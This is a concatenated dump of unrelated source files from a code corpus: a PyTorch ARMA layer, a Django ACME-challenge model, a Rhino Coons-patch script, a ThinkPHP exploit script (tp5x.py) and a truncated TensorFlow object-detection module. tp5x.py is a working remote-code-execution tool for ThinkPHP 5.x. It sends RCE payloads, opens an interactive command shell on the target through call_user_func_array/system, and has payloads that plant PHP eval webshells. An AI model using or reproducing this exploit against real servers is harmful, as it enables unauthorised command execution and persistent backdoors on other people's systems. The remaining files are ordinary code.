        self.autoregressive = AutoRegressive2d(out_channels, a_kernel_size, padding=a_padding, padding_mode=a_padding_mode, stride=a_stride, dilation=a_dilation)

    def forward(self, x):
        """
        Computation of 2D-ARMA layer: MA convolution, then AR filtering.
        """
        x = self.moving_average(x)
        x = self.autoregressive(x)
        return x
class AutoRegressive2d(nn.Module):
    """Dispatcher for the 2D autoregressive filter by padding mode.

    Only 'circular' is implemented in this file; 'reflect' refers to
    AutoRegressive_reflect, presumably defined elsewhere in the project.
    """

    def __init__(self, channels, kernel_size=3, padding=0, padding_mode='circular', stride=1, dilation=1):
        """
        Initialization of 2D-AutoRegressive layer.
        """
        super(AutoRegressive2d, self).__init__()
        if padding_mode == "circular":
            self.a = AutoRegressive_circular(channels, kernel_size, padding, stride, dilation)
        elif padding_mode == "reflect":
            self.a = AutoRegressive_reflect(channels, kernel_size, padding, stride, dilation)
        else:
            raise NotImplementedError

    def forward(self, x):
        """
        Computation of 2D-AutoRegressive layer.
        """
        x = self.a(x)
        return x
class AutoRegressive_circular(nn.Module):
    """Learnable 2D AR filter with circular boundary handling."""

    def __init__(self, channels, kernel_size=3, padding=0, stride=1, dilation=1):
        """
        Initialization of a 2D-AutoRegressive layer (with circular padding).

        NOTE(review): padding/stride/dilation are accepted but unused by
        this implementation -- confirm whether that is intended.
        """
        super(AutoRegressive_circular, self).__init__()
        # One (kernel_size//2, 4) coefficient set per channel; the 4 slots
        # parameterize the x/y AR factors (see autoregressive_circular).
        self.alpha = nn.Parameter(torch.Tensor(channels, kernel_size//2, 4))
        self.set_parameters()

    def set_parameters(self):
        """
        Initialization of the learnable parameters.

        Zero coefficients make the AR filter start out as the identity
        (impulse) filter, so the layer is initially a no-op.
        """
        nn.init.zeros_(self.alpha)

    def forward(self, x):
        """
        Computation of the 2D-AutoRegressive layer (with circular padding).
        """
        x = autoregressive_circular(x, self.alpha)
        return x
def autoregressive_circular(x, alpha):
    """
    Computation of a 2D-AutoRegressive layer (with circular padding).

    x:     input of shape [M, T, I1, I2] (batch, channels, height, width;
           shapes per the comments on ar_circular below).
    alpha: coefficients of shape [T, P, 4]; tanh-squashed and combined into
           first-order factors along x and y via +-45-degree rotations.
    Inputs smaller than the filter support are returned unchanged.
    """
    if x.size()[-2] < alpha.size()[1] * 2 + 1 or x.size()[-1] < alpha.size()[1] * 2 + 1:
        return x

    # There're 4 chunks, each chunk is [T, P, 1]
    # tanh / sqrt(2) keeps each rotated coefficient's magnitude below 1
    # (stability of the AR filter -- NOTE(review): rationale inferred).
    alpha = alpha.tanh() / math.sqrt(2)
    chunks = torch.chunk(alpha, alpha.size()[-1], -1)

    # size: [T, P, 1]
    A_x_left = (chunks[0]*math.cos(-math.pi/4)-chunks[1]*math.sin(-math.pi/4))
    A_x_right = (chunks[0]*math.sin(-math.pi/4)+chunks[1]*math.cos(-math.pi/4))
    A_y_left = (chunks[2]*math.cos(-math.pi/4)-chunks[3]*math.sin(-math.pi/4))
    A_y_right = (chunks[2]*math.sin(-math.pi/4)+chunks[3]*math.cos(-math.pi/4))

    # zero padding + circulant shift:
    # [A_x_left 1 A_x_right] -> [1 A_x_right 0 0 ... 0 A_x_left]
    # size: [T, P, 3]->[T, P, I1] or [T, P, I2]
    A_x = torch.cat((torch.ones(chunks[0].size(), device=alpha.device), A_x_right, torch.zeros(chunks[0].size()[0], chunks[0].size()[1], x.size()[-2] - 3, device=alpha.device), A_x_left), -1)
    A_y = torch.cat((torch.ones(chunks[2].size(), device = alpha.device), A_y_right, torch.zeros(chunks[2].size()[0], chunks[2].size()[1], x.size()[-1] - 3, device=alpha.device), A_y_left), -1)

    # size: [T, P, I1] + [T, P, I2] -> [T, P, I1, I2]
    # Outer product builds the separable 2D filter per channel/order.
    A = torch.einsum('tzi,tzj->tzij',(A_x, A_y))

    # Complex Division: FFT/FFT -> irFFT
    # Apply the P AR factors sequentially (cascade of filters).
    A_s = torch.chunk(A, A.size()[1], 1)
    for i in range(A.size()[1]):
        x = ar_circular.apply(x, torch.squeeze(A_s[i], 1))
    return x
def complex_division(x, A, trans_deno=False):
    """Elementwise complex division with real/imag parts packed along the
    last dimension.

    Returns x / A, or x / conj(A) when ``trans_deno`` is True.
    """
    real_x, imag_x = torch.chunk(x, 2, -1)
    real_A, imag_A = torch.chunk(A, 2, -1)
    denom = real_A * real_A + imag_A * imag_A
    if trans_deno:
        # [a bj] / [c -dj] -> [ac-bd/(c^2+d^2) (bc+ad)/(c^2+d^2)j]
        real_out = (real_x * real_A - imag_x * imag_A) / denom
        imag_out = (imag_x * real_A + real_x * imag_A) / denom
    else:
        # [a bj] / [c dj] -> [ac+bd/(c^2+d^2) (bc-ad)/(c^2+d^2)j]
        real_out = (real_x * real_A + imag_x * imag_A) / denom
        imag_out = (imag_x * real_A - real_x * imag_A) / denom
    return torch.cat((real_out, imag_out), -1)
def complex_multiplication(x, A, trans_deno=False):
    """Elementwise complex multiplication with real/imag parts packed along
    the last dimension.

    Returns x * A, or x * conj(A) when ``trans_deno`` is True.
    """
    real_x, imag_x = torch.chunk(x, 2, -1)
    real_A, imag_A = torch.chunk(A, 2, -1)
    if trans_deno:
        # [a bj]*[c -dj] -> [ac+bd (bc-ad)j]
        real_out = real_x * real_A + imag_x * imag_A
        imag_out = imag_x * real_A - real_x * imag_A
    else:
        # [a bj]*[c dj] -> [ac-bd (ad+bc)j]
        real_out = real_x * real_A - imag_x * imag_A
        imag_out = imag_x * real_A + real_x * imag_A
    return torch.cat((real_out, imag_out), -1)
class ar_circular(torch.autograd.Function):
    """Custom autograd op solving the circular AR filter y (x) a = x in the
    frequency domain: y = irfft(rfft(x) / rfft(a)), with an analytic
    backward pass for both x and a.

    NOTE(review): torch.rfft/torch.irfft were removed in torch >= 1.8, so
    this code requires an older torch (or porting to torch.fft).
    """
    # x size: [M, T, I1, I2]
    # a size:[T, I1, I2]
    @staticmethod
    def forward(ctx, x, a):
        X = torch.rfft(x, 2, onesided=False) # size:[M, T, I1, I2, 2]
        A = torch.rfft(a, 2, onesided=False) # size:[T, I1, I2, 2]
        Y = complex_division(X, A) # size:[M, T, I1, I2, 2]
        y = torch.irfft(Y, 2, onesided=False) # size:[M, T, I1, I2]
        # A and Y are reused by the backward formulas below.
        ctx.save_for_backward(A, Y)
        return y

    @staticmethod
    def backward(ctx, grad_y):
        """
        {grad_a} * a^T = - grad_y * y^T
        [T, I1, I2] * [T, I1, I2] = [M, T, I1, I2] * [M, T, I1, I2]
        a^T * {grad_x} = grad_y
        [T, I1, I2] * [M, T, I1, I2] = [M, T, I1, I2]
        intermediate = grad_y / a^T
        """
        A, Y = ctx.saved_tensors
        grad_x = grad_a = None
        grad_Y = torch.rfft(grad_y, 2, onesided = False)
        # grad wrt x: divide by the conjugate of A in frequency space.
        intermediate = complex_division(grad_Y, A, trans_deno = True) # size: [M, T, I1, I2]
        grad_x = torch.irfft(intermediate, 2, onesided=False)
        # grad wrt a: -(grad_y / conj(A)) * conj(Y), summed over the batch.
        intermediate = - complex_multiplication(intermediate, Y, trans_deno = True) # size: [M, T, I1, I2]
        grad_a = torch.irfft(intermediate.sum(0), 2, onesided = False) # size:[T, I1, I2]
        return grad_x, grad_a
| 37.431138 | 237 | 0.567109 |
ace75c9f3d21a0a01c7be48953762a72280bc68b | 1,568 | py | Python | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 72 | 2016-12-05T16:17:32.000Z | 2021-11-12T21:33:21.000Z | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 112 | 2016-11-21T02:10:18.000Z | 2021-05-31T10:06:51.000Z | letsencrypt/models.py | urda/django-letsencrypt | 4a7547075fb3090783ac0984dbd2db99fddc8865 | [
"Apache-2.0"
] | 10 | 2017-02-27T20:15:02.000Z | 2021-06-09T01:25:08.000Z | """
Copyright 2016-2020 Peter Urda
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.db import models
from django.urls import (
reverse,
NoReverseMatch,
)
class AcmeChallenge(models.Model):
    """
    Simple model to handle Let's Encrypt .well-known/acme-challenge objects
    """
    # Token requested at /.well-known/acme-challenge/<challenge>.
    challenge = models.CharField(
        help_text='The identifier for this challenge',
        unique=True,
        max_length=255,
    )
    # Expected response body for that challenge token.
    response = models.CharField(
        help_text='The response expected for this challenge',
        max_length=255,
    )

    def __str__(self):
        return self.challenge

    def get_acme_url(self):
        """
        Get the URL to this ACME challenge

        :return: The URL as a string, or '' when the 'detail' route of the
                 letsencrypt app cannot be reversed (e.g. URLs not wired up)
        """
        try:
            return reverse(
                viewname='detail',
                current_app='letsencrypt',
                args=[self.challenge],
            )
        except NoReverseMatch:
            return ''

    class Meta:
        verbose_name = 'ACME Challenge'
        verbose_name_plural = 'ACME Challenges'
| 26.133333 | 75 | 0.652423 |
ace75cbc92a3ec4f137658d22635107a88eca71f | 785 | py | Python | src/day_2/day_2_01/01_coons_patch_in_order.py | BlockResearchGroup/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | 1 | 2018-10-01T16:16:21.000Z | 2018-10-01T16:16:21.000Z | src/day_2/day_2_01/01_coons_patch_in_order.py | compas-Workshops/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | null | null | null | src/day_2/day_2_01/01_coons_patch_in_order.py | compas-Workshops/AAG2018 | f4d1188798593b4aec019aa8bfe091305330b374 | [
"MIT"
] | 2 | 2018-09-22T22:12:11.000Z | 2018-11-30T10:31:00.000Z | import rhinoscriptsyntax as rs
from compas.geometry import discrete_coons_patch
from compas.utilities import geometric_key
from compas.datastructures import Mesh
from compas_rhino.artists.meshartist import MeshArtist
if __name__ == '__main__':

    # division in both directions (same sampling density along u and v)
    div = 15

    # select curves interactively in Rhino; exactly four are expected
    crvs = rs.GetObjects("Select four curves (in cw order)", 4)

    # divide curves into point rows, one row per boundary curve
    sets_pts = [rs.DivideCurve(crv, div) for crv in crvs]

    # create coons patch from the four boundaries (ab, bc, dc, ad)
    ab, bc, dc, ad = sets_pts
    points, faces = discrete_coons_patch(ab, bc, dc, ad)

    # create mesh object from points and faces
    mesh = Mesh.from_vertices_and_faces(points, faces)

    # draw coons mesh on its own Rhino layer
    artist = MeshArtist(mesh, layer='coons_mesh')
    artist.draw()
| 23.787879 | 63 | 0.699363 |
ace75d6111458e48b89cddccfc9fa4e3d46eea54 | 3,862 | py | Python | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | 8 | 2019-06-19T01:28:34.000Z | 2020-12-14T10:11:34.000Z | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | null | null | null | tp5x.py | zyazhb/thinkphp5-poc | 131669a8ec7498b7f121c9633a4e52d117dfcda3 | [
"Apache-2.0"
] | 3 | 2019-07-31T01:27:03.000Z | 2020-11-23T13:13:45.000Z | #ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
#v5.x below v5.0.23,v5.1.31 shell BY-ZYA
import requests
import re
import optparse
import time
def test_url(url, v):
    """Probe *url* with every payload from thinkphp_poc.txt and report hits.

    url: target index.php, e.g. http://host/thinkphp/public/index.php
    v:   verbose flag; print every attempted poc and its failures.

    A poc is considered usable when the response contains neither
    'HttpException ' nor 'System Error'.  Exits early if no ThinkPHP
    version string can be fingerprinted.
    """
    num = 0
    # Fingerprint first: ThinkPHP's error page leaks a "Vx.y.z" string.
    r = requests.get(url + "?s=version_test")
    version = re.findall('V[0-9].[0-9].[0-9]{1,2}', r.text)
    if version:
        print("Version detected:" + str(version))
    else:
        print('Version seems can not be detected!')
        exit()
    time.sleep(1)
    # Fix: the poc file was previously opened without ever being closed;
    # a context manager guarantees the handle is released.
    with open("thinkphp_poc.txt") as f:
        for exp in f:
            if v:
                print("[o]Trying poc: " + url + exp)
            try:
                r = requests.get(url + exp)
            except Exception:
                # Fix: was a bare `except:`; only swallow request errors
                # for this poc and move on to the next one.
                continue
            exist = (re.findall('HttpException ', r.text) or
                     re.findall('System Error', r.text))
            if exist:
                if v:
                    print('[-]Failed\n')
                continue
            else:
                print("[+]Found:" + url + exp + "\n[+]Seem Exist!\n")
                num = num + 1
                print("[+]Response:\n" + r.text + '\n' + '-' * 200)
    print("[+++]Test Done!" + str(num) + " poc(s) seem can be use")
def getshell(url):
    """Interactive pseudo-shell: read a command, fire it through the
    ThinkPHP RCE payload against *url*, print the raw HTTP response.
    Loops forever (Ctrl-C to quit)."""
    prompt = '\nShell by-zya$'
    payload_head = "?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r\'system(\""
    payload_tail = "\");'"
    while True:
        cmd = input(prompt)
        response = requests.get(url + payload_head + cmd + payload_tail)
        print(response.text)
def upload(url, passwd, v=False):
    """Try three webshell-upload payloads against *url* and report hits.

    url:    target index.php URL.
    passwd: POST parameter name for the dropped eval() shell.
    v:      verbose flag (new keyword with a default -- the previous code
            referenced an undefined global ``v`` and raised NameError).

    Bugfixes: ``num`` is now initialised before use (it was read by
    ``num = num + 1`` without ever being assigned, so the first successful
    payload crashed with NameError), and per-payload request errors are
    skipped instead of aborting via a bare ``except``.
    """
    exp1 = '?s=index/\\think\\template\driver\\file/write&cacheFile=bak1.php&content=<?php @eval($_POST['+passwd+']);?>'
    exp2 = '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak2.php&vars[1][]=<?php @eval($_POST['+passwd+']);?>'
    exp3 = '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST['+passwd+']);?>\'>bak3.php'
    explist = [exp1, exp2, exp3]
    num = 0
    for exp in explist:
        if v:
            print("[o]Trying exp: " + url + exp)
        try:
            r = requests.get(url + exp)
        except Exception:
            continue
        # Failure markers: permission error or the raw payload echoed back.
        exist = (re.findall('Permission denied ', r.text) or
                 re.findall('\template\driver\file', r.text))
        if exist:
            if v:
                print('[-]Failed\n')
            continue
        else:
            print("[+]Found:" + url + exp + "\n[+]Seem Exist!\n")
            num = num + 1
            print("[+]Response:\n" + r.text + '\n' + '-' * 200)
    print("[+++]Test Done!" + str(num) + " poc(s) seem can be use")
def main():
parser = optparse.OptionParser("ThinkPHP 5.x RCE exp by ZYA\n useage %prog "+"-u <url>\n -h <help>")
parser.add_option('-u', dest='u', type='string', help='Target URL')
parser.add_option('-v', dest='v', action='store_true', help='Show trying url detail')
parser.add_option('--shell', dest='shell', action='store_true', help='Prompt for an interactive operating system shell')
parser.add_option('--upload', dest='upload', help='Prompt for an interactive operating system shell')
#parser.add_option('--s2', dest='s2', type='string', help='specify string2')
(options, args) = parser.parse_args()
if options.shell == None and options.u != None:
test_url(options.u,options.v);
exit(0)
elif options.shell != None and options.u != None:
getshell(options.u)
elif options.shell != None and options.u != None:
upload(options.u,options.upload)
else:
print(parser.usage)
exit(0)
if __name__ == '__main__':
main()
| 42.43956 | 170 | 0.571207 |
ace75d99371662916c55c1be1d814d90e490314e | 34,842 | py | Python | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 79 | 2019-03-02T17:40:25.000Z | 2021-08-17T13:22:03.000Z | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 8 | 2019-05-14T10:10:50.000Z | 2020-12-20T14:05:29.000Z | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 27 | 2019-02-04T01:45:48.000Z | 2021-03-18T02:39:28.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Constructs model, inputs, and training environment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import functools
import os
import tensorflow as tf
from object_detection import eval_util
from object_detection import exporter as exporter_lib
from object_detection import inputs
from object_detection.builders import graph_rewriter_builder
from object_detection.builders import model_builder
from object_detection.builders import optimizer_builder
from object_detection.core import standard_fields as fields
from object_detection.utils import config_util
from object_detection.utils import label_map_util
from object_detection.utils import shape_utils
from object_detection.utils import variables_helper
from object_detection.utils import visualization_utils as vis_utils
# A map of names to methods that help build the model.
# NOTE(review): the string-keyed indirection (rather than calling the builder
# functions directly) presumably exists so tests or callers can substitute
# alternative builders without monkey-patching the modules — confirm before
# relying on it.
MODEL_BUILD_UTIL_MAP = {
    'get_configs_from_pipeline_file':
        config_util.get_configs_from_pipeline_file,
    'create_pipeline_proto_from_configs':
        config_util.create_pipeline_proto_from_configs,
    'merge_external_params_with_configs':
        config_util.merge_external_params_with_configs,
    'create_train_input_fn':
        inputs.create_train_input_fn,
    'create_eval_input_fn':
        inputs.create_eval_input_fn,
    'create_predict_input_fn':
        inputs.create_predict_input_fn,
}
def _prepare_groundtruth_for_eval(detection_model, class_agnostic,
                                  max_number_of_boxes):
  """Extracts groundtruth data from detection_model and prepares it for eval.

  Args:
    detection_model: A `DetectionModel` object.
    class_agnostic: Whether the detections are class_agnostic.
    max_number_of_boxes: Max number of groundtruth boxes.

  Returns:
    A dictionary with the following fields:
      'groundtruth_boxes': [batch_size, num_boxes, 4] float32 tensor of boxes,
        in normalized coordinates.
      'groundtruth_classes': [batch_size, num_boxes] int64 tensor of 1-indexed
        classes.
      'groundtruth_masks': 4D float32 tensor of instance masks (if provided in
        groundtruth)
      'groundtruth_is_crowd': [batch_size, num_boxes] bool tensor indicating
        is_crowd annotations (if provided in groundtruth).
      'num_groundtruth_boxes': [batch_size] tensor containing the maximum
        number of groundtruth boxes per image.
  """
  input_data_fields = fields.InputDataFields()
  # Stack the per-image groundtruth box lists into one batched tensor.
  groundtruth_boxes = tf.stack(
      detection_model.groundtruth_lists(fields.BoxListFields.boxes))
  groundtruth_boxes_shape = tf.shape(groundtruth_boxes)
  # For class-agnostic models, groundtruth one-hot encodings collapse to all
  # ones.
  if class_agnostic:
    groundtruth_classes_one_hot = tf.ones(
        [groundtruth_boxes_shape[0], groundtruth_boxes_shape[1], 1])
  else:
    groundtruth_classes_one_hot = tf.stack(
        detection_model.groundtruth_lists(fields.BoxListFields.classes))
  label_id_offset = 1  # Applying label id offset (b/63711816)
  # Convert one-hot class encodings back to 1-indexed integer labels.
  groundtruth_classes = (
      tf.argmax(groundtruth_classes_one_hot, axis=2) + label_id_offset)
  groundtruth = {
      input_data_fields.groundtruth_boxes: groundtruth_boxes,
      input_data_fields.groundtruth_classes: groundtruth_classes
  }
  # Masks and is_crowd annotations are optional; only attach them when the
  # model was actually provided with them.
  if detection_model.groundtruth_has_field(fields.BoxListFields.masks):
    groundtruth[input_data_fields.groundtruth_instance_masks] = tf.stack(
        detection_model.groundtruth_lists(fields.BoxListFields.masks))
  if detection_model.groundtruth_has_field(fields.BoxListFields.is_crowd):
    groundtruth[input_data_fields.groundtruth_is_crowd] = tf.stack(
        detection_model.groundtruth_lists(fields.BoxListFields.is_crowd))
  # Every image in the batch reports the same (maximum) box count here; the
  # per-image true counts are not recovered at this point.
  groundtruth[input_data_fields.num_groundtruth_boxes] = (
      tf.tile([max_number_of_boxes], multiples=[groundtruth_boxes_shape[0]]))
  return groundtruth
def unstack_batch(tensor_dict, unpad_groundtruth_tensors=True):
  """Unstacks all tensors in `tensor_dict` along 0th dimension.

  Unstacks tensor from the tensor dict along 0th dimension and returns a
  tensor_dict containing values that are lists of unstacked, unpadded tensors.

  Tensors in the `tensor_dict` are expected to be of one of the three shapes:
  1. [batch_size]
  2. [batch_size, height, width, channels]
  3. [batch_size, num_boxes, d1, d2, ... dn]

  When unpad_groundtruth_tensors is set to true, unstacked tensors of form 3
  above are sliced along the `num_boxes` dimension using the value in tensor
  field.InputDataFields.num_groundtruth_boxes.

  Note that this function has a static list of input data fields and has to be
  kept in sync with the InputDataFields defined in core/standard_fields.py

  Args:
    tensor_dict: A dictionary of batched groundtruth tensors.
    unpad_groundtruth_tensors: Whether to remove padding along `num_boxes`
      dimension of the groundtruth tensors.

  Returns:
    A dictionary where the keys are from fields.InputDataFields and values are
    a list of unstacked (optionally unpadded) tensors.

  Raises:
    ValueError: If unpad_tensors is True and `tensor_dict` does not contain
      `num_groundtruth_boxes` tensor.
  """
  # Split every batched tensor into a Python list of per-example tensors.
  unbatched_tensor_dict = {
      key: tf.unstack(tensor) for key, tensor in tensor_dict.items()
  }
  if unpad_groundtruth_tensors:
    # The per-example true box counts are required to strip padding.
    if (fields.InputDataFields.num_groundtruth_boxes not in
        unbatched_tensor_dict):
      raise ValueError('`num_groundtruth_boxes` not found in tensor_dict. '
                       'Keys available: {}'.format(
                           unbatched_tensor_dict.keys()))
    unbatched_unpadded_tensor_dict = {}
    unpad_keys = set([
        # List of input data fields that are padded along the num_boxes
        # dimension. This list has to be kept in sync with InputDataFields in
        # standard_fields.py.
        fields.InputDataFields.groundtruth_instance_masks,
        fields.InputDataFields.groundtruth_classes,
        fields.InputDataFields.groundtruth_boxes,
        fields.InputDataFields.groundtruth_keypoints,
        fields.InputDataFields.groundtruth_group_of,
        fields.InputDataFields.groundtruth_difficult,
        fields.InputDataFields.groundtruth_is_crowd,
        fields.InputDataFields.groundtruth_area,
        fields.InputDataFields.groundtruth_weights
    ]).intersection(set(unbatched_tensor_dict.keys()))

    for key in unpad_keys:
      unpadded_tensor_list = []
      for num_gt, padded_tensor in zip(
          unbatched_tensor_dict[fields.InputDataFields.num_groundtruth_boxes],
          unbatched_tensor_dict[key]):
        tensor_shape = shape_utils.combined_static_and_dynamic_shape(
            padded_tensor)
        # Slice [0:num_gt] along dim 0 and take the full extent of every
        # remaining dimension (-1 where the static dim is unknown).
        slice_begin = tf.zeros([len(tensor_shape)], dtype=tf.int32)
        slice_size = tf.stack(
            [num_gt] + [-1 if dim is None else dim for dim in tensor_shape[1:]])
        unpadded_tensor = tf.slice(padded_tensor, slice_begin, slice_size)
        unpadded_tensor_list.append(unpadded_tensor)
      unbatched_unpadded_tensor_dict[key] = unpadded_tensor_list

    # Replace padded entries with their unpadded counterparts; other keys
    # keep their (merely unstacked) values.
    unbatched_tensor_dict.update(unbatched_unpadded_tensor_dict)

  return unbatched_tensor_dict
def create_model_fn(detection_model_fn, configs, hparams, use_tpu=False):
  """Creates a model function for `Estimator`.

  Args:
    detection_model_fn: Function that returns a `DetectionModel` instance.
    configs: Dictionary of pipeline config objects.
    hparams: `HParams` object.
    use_tpu: Boolean indicating whether model should be constructed for
        use on TPU.

  Returns:
    `model_fn` for `Estimator`.
  """
  train_config = configs['train_config']
  eval_input_config = configs['eval_input_config']
  eval_config = configs['eval_config']

  def model_fn(features, labels, mode, params=None):
    """Constructs the object detection model.

    Args:
      features: Dictionary of feature tensors, returned from `input_fn`.
      labels: Dictionary of groundtruth tensors if mode is TRAIN or EVAL,
        otherwise None.
      mode: Mode key from tf.estimator.ModeKeys.
      params: Parameter dictionary passed from the estimator.

    Returns:
      An `EstimatorSpec` that encapsulates the model and its serving
        configurations.
    """
    params = params or {}
    total_loss, train_op, detections, export_outputs = None, None, None, None
    is_training = mode == tf.estimator.ModeKeys.TRAIN

    # Make sure to set the Keras learning phase. True during training,
    # False for inference.
    tf.keras.backend.set_learning_phase(is_training)
    detection_model = detection_model_fn(
        is_training=is_training, add_summaries=(not use_tpu))
    scaffold_fn = None

    # --- Groundtruth preparation: unstack the batched label tensors into
    # per-example lists (unpadding where the static shape allows it). ---
    if mode == tf.estimator.ModeKeys.TRAIN:
      labels = unstack_batch(
          labels,
          unpad_groundtruth_tensors=train_config.unpad_groundtruth_tensors)
    elif mode == tf.estimator.ModeKeys.EVAL:
      # For evaling on train data, it is necessary to check whether groundtruth
      # must be unpadded.
      boxes_shape = (
          labels[fields.InputDataFields.groundtruth_boxes].get_shape()
          .as_list())
      unpad_groundtruth_tensors = boxes_shape[1] is not None and not use_tpu
      labels = unstack_batch(
          labels, unpad_groundtruth_tensors=unpad_groundtruth_tensors)

    if mode in (tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL):
      # Optional groundtruth fields default to None when absent from labels.
      gt_boxes_list = labels[fields.InputDataFields.groundtruth_boxes]
      gt_classes_list = labels[fields.InputDataFields.groundtruth_classes]
      gt_masks_list = None
      if fields.InputDataFields.groundtruth_instance_masks in labels:
        gt_masks_list = labels[
            fields.InputDataFields.groundtruth_instance_masks]
      gt_keypoints_list = None
      if fields.InputDataFields.groundtruth_keypoints in labels:
        gt_keypoints_list = labels[fields.InputDataFields.groundtruth_keypoints]
      gt_weights_list = None
      if fields.InputDataFields.groundtruth_weights in labels:
        gt_weights_list = labels[fields.InputDataFields.groundtruth_weights]
      gt_confidences_list = None
      if fields.InputDataFields.groundtruth_confidences in labels:
        gt_confidences_list = labels[
            fields.InputDataFields.groundtruth_confidences]
      gt_is_crowd_list = None
      if fields.InputDataFields.groundtruth_is_crowd in labels:
        gt_is_crowd_list = labels[fields.InputDataFields.groundtruth_is_crowd]
      detection_model.provide_groundtruth(
          groundtruth_boxes_list=gt_boxes_list,
          groundtruth_classes_list=gt_classes_list,
          groundtruth_confidences_list=gt_confidences_list,
          groundtruth_masks_list=gt_masks_list,
          groundtruth_keypoints_list=gt_keypoints_list,
          groundtruth_weights_list=gt_weights_list,
          groundtruth_is_crowd_list=gt_is_crowd_list)

    # --- Forward pass. Under bfloat16 on TPU, run predict inside a bfloat16
    # scope and cast outputs back to float32 so loss/postprocessing stay in
    # full precision. ---
    preprocessed_images = features[fields.InputDataFields.image]
    if use_tpu and train_config.use_bfloat16:
      with tf.contrib.tpu.bfloat16_scope():
        prediction_dict = detection_model.predict(
            preprocessed_images,
            features[fields.InputDataFields.true_image_shape])
        for k, v in prediction_dict.items():
          if v.dtype == tf.bfloat16:
            prediction_dict[k] = tf.cast(v, tf.float32)
    else:
      prediction_dict = detection_model.predict(
          preprocessed_images,
          features[fields.InputDataFields.true_image_shape])

    if mode in (tf.estimator.ModeKeys.EVAL, tf.estimator.ModeKeys.PREDICT):
      detections = detection_model.postprocess(
          prediction_dict, features[fields.InputDataFields.true_image_shape])

    # --- Fine-tune checkpoint restoration (TRAIN only). ---
    if mode == tf.estimator.ModeKeys.TRAIN:
      if train_config.fine_tune_checkpoint and hparams.load_pretrained:
        if not train_config.fine_tune_checkpoint_type:
          # train_config.from_detection_checkpoint field is deprecated. For
          # backward compatibility, set train_config.fine_tune_checkpoint_type
          # based on train_config.from_detection_checkpoint.
          if train_config.from_detection_checkpoint:
            train_config.fine_tune_checkpoint_type = 'detection'
          else:
            train_config.fine_tune_checkpoint_type = 'classification'
        asg_map = detection_model.restore_map(
            fine_tune_checkpoint_type=train_config.fine_tune_checkpoint_type,
            load_all_detection_checkpoint_vars=(
                train_config.load_all_detection_checkpoint_vars))
        # Only initialize variables that actually exist in the checkpoint.
        available_var_map = (
            variables_helper.get_variables_available_in_checkpoint(
                asg_map,
                train_config.fine_tune_checkpoint,
                include_global_step=False))
        if use_tpu:

          def tpu_scaffold():
            # On TPU, checkpoint restoration must happen inside the scaffold.
            tf.train.init_from_checkpoint(train_config.fine_tune_checkpoint,
                                          available_var_map)
            return tf.train.Scaffold()

          scaffold_fn = tpu_scaffold
        else:
          tf.train.init_from_checkpoint(train_config.fine_tune_checkpoint,
                                        available_var_map)

    # --- Loss computation (TRAIN and EVAL). ---
    if mode in (tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL):
      losses_dict = detection_model.loss(
          prediction_dict, features[fields.InputDataFields.true_image_shape])
      losses = [loss_tensor for loss_tensor in losses_dict.values()]
      if train_config.add_regularization_loss:
        regularization_losses = detection_model.regularization_losses()
        if regularization_losses:
          regularization_loss = tf.add_n(
              regularization_losses, name='regularization_loss')
          losses.append(regularization_loss)
          losses_dict['Loss/regularization_loss'] = regularization_loss
      total_loss = tf.add_n(losses, name='total_loss')
      losses_dict['Loss/total_loss'] = total_loss

      if 'graph_rewriter_config' in configs:
        graph_rewriter_fn = graph_rewriter_builder.build(
            configs['graph_rewriter_config'], is_training=is_training)
        graph_rewriter_fn()

      # TODO(rathodv): Stop creating optimizer summary vars in EVAL mode once we
      # can write learning rate summaries on TPU without host calls.
      global_step = tf.train.get_or_create_global_step()
      training_optimizer, optimizer_summary_vars = optimizer_builder.build(
          train_config.optimizer)

    # --- Training op construction (TRAIN only). ---
    if mode == tf.estimator.ModeKeys.TRAIN:
      if use_tpu:
        training_optimizer = tf.contrib.tpu.CrossShardOptimizer(
            training_optimizer)

      # Optionally freeze some layers by setting their gradients to be zero.
      trainable_variables = None
      include_variables = (
          train_config.update_trainable_variables
          if train_config.update_trainable_variables else None)
      exclude_variables = (
          train_config.freeze_variables
          if train_config.freeze_variables else None)
      trainable_variables = tf.contrib.framework.filter_variables(
          tf.trainable_variables(),
